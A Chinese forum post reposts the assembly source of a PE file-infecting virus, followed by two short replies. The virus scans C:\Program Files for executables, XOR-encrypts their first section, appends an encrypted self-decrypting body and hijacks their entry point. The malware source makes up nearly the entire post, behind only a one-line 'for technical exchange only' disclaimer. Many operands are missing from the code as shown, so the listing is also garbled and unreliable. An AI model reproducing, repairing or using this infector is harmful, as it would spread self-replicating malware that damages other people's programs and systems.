发个病毒的源码
发个病毒的源码,从别的地方转过来,用汇编写的.以下内容只做技术交流,请勿用于非法用途。
============================================
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Module:peinj.asm
;
;Author:charme
;Email:charme000@gmail.com
;Time:2009.8.13
;Index:www.hi.baidu.com/charme000
;Description:
;
;-感染c:\progma file\下的exe文件
;-加密开始的一个节
;-key也简单
;
;Copyright (c) 2009 charme.
;
;Just for fun!
;Do it ,do our best!
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.486
.model flat,stdcall
option casemap :none
include windows.inc
include kernel32.inc
includelib kernel32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
VIRUS_SIZE equ end_virus - start_virus ;病毒大小
VIRUS_BODYSIZE equ end_virus - virus_body ;病毒体大小
VIRUS_DECRSIZE equ virus_body - start_virus ;病毒头大小
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;三个过程
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
@InfectFile PROTO
@FirstRecurse PROTO
@FindEexRecurse PROTO
.data
dummy dd 0
;;==============================================================;; == = = == =
;;=------------------------------------------------------------=;; == == ==
;;= =;; = = == =
;;= **的开始 =;; = = == =
;;= =;; = = = = =
;;=------------------------------------------------------------=;; == = = =
;;==============================================================;; = = == = === == ====www.hi.baidu.com/charme000==
.code
start_virus:
call GetDelta ;变量,执行完push esp
GetDelta:
pop ebp
sub ebp,offset GetDelta;典型的重定位
;*
@@:
lea esi,
lea edi,
mov ecx, VIRUS_BODYSIZE;一看就是准备循环
mov bl, ;加密
@@:
.if ecx == 0
jmp @F
.endif
lodsb ;从esi指向的内存中读取一个字节到al中,同时inc esi
xor al,bl ;逐字节加密
stosb ;把al中的内存存入edi
dec ecx ;递减计数
jmp @B
@@:
jmp @F ;跳转到*处
virus_body: ;开始病毒执行体
db "charme"
@@:
mov esi,
mov edi,esi
mov ecx, ;作为计数
@@:
.if ecx == 0
jmp @F
.endif
lodsb
xor al,bl
stosb
dec ecx
jmp @B
@@:
mov ,bl;保存密匙
mov eax,
and eax,0FFFFF000h;找到基址
compare:
cmp WORD ptr ,'ZM'
je api_found
sub eax, 1000h;一页一页搜索
jmp compare;循环
api_found:
;LoadLibrary
mov , eax;保存指针
lea esi,
callGetFunctionAddress
mov ,eax;保存函数地址
;FindFirstFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;SetCurrentDirectory
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;GetFileAttributes
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;FindNextFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;FindClose
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;CreateFile
mov eax,
lea esi,
call GetFunctionAddress
mov DWORD ptr ,eax
;lstrcpy
mov eax,
lea esi,
call GetFunctionAddress
mov DWORD ptr ,eax
;GetFileSize
mov eax,
lea esi,
call GetFunctionAddress
mov DWORD ptr ,eax
;CreateFileMapping
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;MapViewOfFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;ExitProcess
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;UnmapViewOfFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;CloseHandle
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
jmp found_all;来个大跳转
;;-----------------------;;
;; 从导入表找函数 ;;
;;-----------------------;;
GetFunctionAddress:
mov ebx, ;pe header
add ebx, eax;加上基址
add ebx, 120
mov ebx,
add ebx, eax ;Export Address
xor edx, edx
mov ecx, ;functionname
add ecx, eax
push esi
push edx
CompareNext:
pop edx
pop esi
inc edx
mov edi,
add edi, eax
add ecx, 4
push esi
push edx
CompareName:
mov dl,
mov dh,
cmp dl, dh
jne CompareNext
inc edi
inc esi
cmp BYTE ptr , 0
je GetAddress
jmp CompareName
GetAddress:
pop edx
pop esi
dec edx
shl edx, 1
mov ecx,
add ecx, eax
add ecx, edx
xor edx, edx
mov dx,
shl edx, 2
mov ecx,
add ecx, eax
add ecx, edx
add eax,
ret
found_all:
lea esi,
push esi
mov eax,;changes the current directory for the current process
call eax
push ebp
call @FirstRecurse;这个是自己定义的函数
pop ebp
jmp end_virus
;;-----------------------;;
;; 找exe ;;
;;-----------------------;;
@FindEexRecurse PROC
;HANDLE FindFirstFile(
;LPCTSTR lpFileName,
;LPWIN32_FIND_DATA lpFindFileData
;);
lea eax,
push eax
lea eax,
push eax
mov eax,
call eax
mov ,eax;保存返回的文件句柄
.if eax == INVALID_HANDLE_VALUE
mov eax,-1
jmp finish
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName;查询这个成员
mov esi,eax
lodsb;从esi中取出一个字节放入al
.if al == '.'
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
push eax;这里其实push一个就可以了
mov eax,
call eax;返回一个文件或者目录的属性
.if eax != FILE_ATTRIBUTE_DIRECTORY;如果是目录
pop eax
mov ,eax
call @InfectFile;感染之
.else
pop eax
.endif
@@:
lea esi,
push esi
mov esi,
push esi
mov eax,
call eax;继续找文件
.if eax == 0
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
mov esi,eax
lodsb
.if al == '.'
jmp @B;继续找文件
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
push eax
mov eax,
call eax
.if eax != FILE_ATTRIBUTE_DIRECTORY
pop eax
mov ,eax
call @InfectFile
.else
pop eax
.endif
jmp @B;一直循环
@@:
finish:
ret
@FindEexRecurse ENDP
;;-----------------------;;
;; 一级资源 ;;
;;-----------------------;;
@FirstRecurse PROC
lea esi,
push esi
lea esi,
push esi
mov eax,
call eax
mov ,eax
.if eax == INVALID_HANDLE_VALUE
mov eax,-1
jmp finish1
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
mov esi,eax
lodsb
.if al == '.'
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
.if eax == FILE_ATTRIBUTE_DIRECTORY
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
call @FindEexRecurse
lea eax,
push eax
mov eax,
call eax
.endif
@@:
lea esi,
push esi
mov eax,
push eax
mov eax,
call eax
.if eax == 0
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
mov esi,eax
lodsb
.if al == '.'
jmp @B
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
.if eax == FILE_ATTRIBUTE_DIRECTORY
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
call @FindEexRecurse
lea eax,
push eax
mov eax,
call eax
.endif
jmp @B
@@:
finish1:
ret
@FirstRecurse ENDP
;;-----------------------;;
;; 感染 ;;
;;-----------------------;;
@InfectFile PROC
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_ALWAYS
push NULL
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_WRITE or GENERIC_READ
mov eax,;文件指针
push eax
mov eax,;创建文件
call eax
mov ,eax;文件句柄
push NULL
push eax
mov eax,
call eax;获得文件大小
add eax,VIRUS_SIZE
add eax,1000h
mov ,eax;最后文件的大小
push 0
mov eax,
push eax
push 0
push PAGE_READWRITE
push NULL
mov eax,
push eax
mov eax,
call eax;创建映射文件
mov ,eax;hMap
push DWORD ptr
push 0
push 0
push FILE_MAP_WRITE
mov eax,
push eax
mov eax,
call eax;开始映射
mov ,eax
mov edi,eax
xor eax,eax
assume edi:ptr IMAGE_DOS_HEADER
mov ax,.e_magic
add edi,.e_lfanew
assume edi:ptr IMAGE_NT_HEADERS
add edi,SIZEOF DWORD
assume edi:ptr IMAGE_FILE_HEADER
xor ecx,ecx
mov cx,.NumberOfSections
mov ,ecx;节个数
add edi,SIZEOF IMAGE_FILE_HEADER
mov ,edi;到达节表处
assume edi:ptr IMAGE_OPTIONAL_HEADER32
mov eax,.ImageBase
mov ,eax;镜像基址
add eax,.AddressOfEntryPoint
mov ,eax;保存旧的入口点
mov eax,.FileAlignment
mov ,eax
add edi,SIZEOF IMAGE_OPTIONAL_HEADER32
assume edi:ptr IMAGE_SECTION_HEADER
; - EDI指向当前节表头
; - ESI 指向RawData高位
; - EAX holds ESI's "parent" segment header pointer
xor esi,esi
@@:
.if ecx == 0
jmp @F
.endif
; 加密第一个节表
.if esi == 0
mov eax,.PointerToRawData
mov ,eax
mov eax,.VirtualAddress
add ,eax;rva
mov eax,.Misc.VirtualSize
mov ,eax
mov al,BYTE ptr .Name1
mov ,al
mov eax,.Characteristics
or eax,0A0000020h
mov .Characteristics,eax
.endif
.if .PointerToRawData > esi
mov esi,.PointerToRawData
mov eax,edi
.endif
add edi,SIZEOF IMAGE_SECTION_HEADER
dec ecx
jmp @B;循环
@@:
mov edi,eax
assume edi:ptr IMAGE_SECTION_HEADER
mov ebx,.Misc.VirtualSize
add ebx,VIRUS_SIZE
add ebx,7
mov .Misc.VirtualSize,ebx
push edi
lea eax,.Name1
mov edi,eax
mov al,'.' ;text section
stosb
mov al,'t'
stosb
mov al,'e'
stosb
mov al,'x'
stosb
mov al,'t'
stosb
mov al,0
stosb
pop edi
xor edx,edx
mov eax,ebx
mov ebx,
div ebx;对齐下
.if edx == 0
mov eax,.Misc.VirtualSize
jmp dont_round
.endif
mov eax,.Misc.VirtualSize
mov ebx,
push ebx
xor ecx,ecx
mov edx,eax
@@:
inc ecx
shr ebx,1
.if ebx == 0
dec ecx
jmp @F
.endif
jmp @B
@@:
sar eax,cl
sal eax,cl
pop ebx
add eax,ebx
dont_round:
mov ebx,.SizeOfRawData
mov .SizeOfRawData,eax
sub eax,ebx
shr eax,12
shl eax,12
mov ,eax
mov eax,.Characteristics
or eax,0A0000020h
mov .Characteristics,eax
mov esi,.VirtualAddress
add esi,.Misc.VirtualSize
sub esi,VIRUS_SIZE
sub esi,7
push esi ; 新入口点
mov esi,.PointerToRawData
add esi,.Misc.VirtualSize
sub esi,VIRUS_SIZE
sub esi,7
mov edi,esi
add edi,
lea esi, ; 解密
mov ecx, VIRUS_DECRSIZE
rep movsb;esi中的拷贝到edi
lea esi,
mov ecx, VIRUS_BODYSIZE
mov bl,
;变换key
inc bl
; xor 0,bl = bl
xor al,al
mov ,al
@@:
.if ecx == 0
jmp @F
.endif
lodsb
xor al,bl
stosb
dec ecx
jmp @B
@@:
push edi
; 加密主体
mov esi,
add esi,
mov edi,esi
mov ecx,
@@:
.if ecx == 0
jmp @F
.endif
lodsb
xor al,bl
stosb
dec ecx
jmp @B
@@:
pop edi
mov al,0b8h;感染标记
stosb
mov eax,
stosd
mov ax,0d0ffh;还原标记
stosw
mov edi,
assume edi:ptr IMAGE_OPTIONAL_HEADER32
pop eax
mov .AddressOfEntryPoint,eax
pop eax
mov ebx,.SizeOfImage
mov eax,
add ebx,eax
mov .SizeOfImage,ebx
; 清理战场
mov eax,
push eax
mov eax,
call eax
mov eax,
push eax
mov eax,
call eax
mov eax,
push eax
mov eax,
call eax
ret
@InfectFile ENDP
jmp end_virus
;;-----------------------------------无穷寂寞--------------------------------------;;
xor_key db 0
firstSegtOffset dd 0
firstSegtVSize dd 0
firstSegtVOffs dd 0
firstSegtKey db 0
_LoadLibrary db "LoadLibrary",0
_a_LoadLibrary dd 0
_CreateFile db "CreateFile",0
_a_CreateFile dd 0
_CreateFileMapping db "CreateFileMapping",0
_a_CreateFileMapping dd 0
_MapViewOfFile db "MapViewOfFile",0
_a_MapViewOfFile dd 0
_SetCurrentDirectory db "SetCurrentDirectory",0
_a_SetCurrentDirectory dd 0
_ExitProcess db "ExitProcess",0
_a_ExitProcess dd 0
_MessageBox db "MessageBox",0
_a_MessageBox dd 0
_UnmapViewOfFile db "UnmapViewOfFile",0
_a_UnmapViewOfFile dd 0
_CloseHandle db "CloseHandle",0
_a_CloseHandle dd 0
_GetFileSize db "GetFileSize",0
_a_GetFileSize dd 0
_FindFirstFile db "FindFirstFile",0
_a_FindFirstFile dd 0
_GetFileAttributes db "GetFileAttributes",0
_a_GetFileAttributes dd 0
_FindNextFile db "FindNextFile",0
_a_FindNextFile dd 0
_FindClose db "FindClose",0
_a_FindClose dd 0
_lstrcpy db "lstrcpy",0
_a_lstrcpy dd 0
__DLL_User32 db "user32",0
__STRING_FileName db "petest.exe",0
__STRING_newdir db MAX_PATH dup(0)
__STRING_dotdot db "..",0
__STRING_filemask db "*.*",0
__STRING_Dot_Star db "*.*",0
__STRING_Dot_Exe db "*.exe",0
__STRING_Dot_Dot db "..",0
__HND_File dd 0
__HND_FirstFind dd 0
__HND_ExeFind dd 0
__MAP_File dd 0
__PTR_File dd 0
;_User32 dd 0
KernelBase dd 0
totalSec dd 0
ptrEP dd 0
oldEP dd 0
oldLast dd 0
secNum dd 0
fileAlign dd 0
deltaImage dd 0
oldrawsize dd 0
__STRUCT_Win32_FindData WIN32_FIND_DATA <>
__STRUCT_Win32_FindExes WIN32_FIND_DATA <>
_STRING_RootInfect db "C:\Program Files\",0
__PTR_fileName dd 0
__max_size dd 0
;;-----------------------------------无穷寂寞--------------------------------------;;
end_virus:
ret
end start_virus 支持一下花花 汇编 也厉害了。 从别的地方转的,只能看懂一部分~
页:
[1]